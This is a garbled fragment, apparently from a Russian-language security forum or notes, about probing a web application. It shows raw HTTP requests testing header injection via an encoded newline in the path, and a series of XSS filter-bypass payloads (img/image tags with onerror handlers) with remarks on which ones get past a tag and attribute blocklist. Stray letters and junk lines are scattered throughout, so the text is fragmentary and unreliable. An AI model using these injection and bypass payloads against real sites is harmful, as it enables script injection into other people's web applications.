s
Size: a a a
s
s
SN
M
P
VK
VK
s
S(
WS
GET /path3/;%0axyz?param=suka.com HTTP/1.1В ответе
Host: www.site.com
User-Agent: asdasasd
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Location: https://www.site.comhttp://www.site.com//?param=suka.com
Да, опечатки нет, я получаю слипшийся локейшн, браузер считает, что тут TLD - .comhttpGET /path3/;%0axyz HTTP/1.1В ответе
Host: www.site.com
User-Agent: asdasasd
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Location: https://www.site.comhttp://www.site.com//?param=suka.com
VS
WS
[O
᠌
applet, base, dir, embed, frame, frameset, iframe, isindex, link, meta, noscript, object, script, style, svg
Заблокированы все аттрибуты, которые начинаются на on
.<a href=javascript:alert()
ибо сам injection point скрыт и кликнуть будет невозможно<img/src=x/onerror=alert()
проходит<img/src='x'/onerror=alert()
блокирует<image/src=x""/onerror=alert()//
, но браузер считает onerror продолжением src᠌
"</td>
VV
᠌
᠌
<image/src=x /src=y" "onerror"="alert()//"</td>
, но видимо из-за того, что аттрибут в ковычках - не работаетVV
S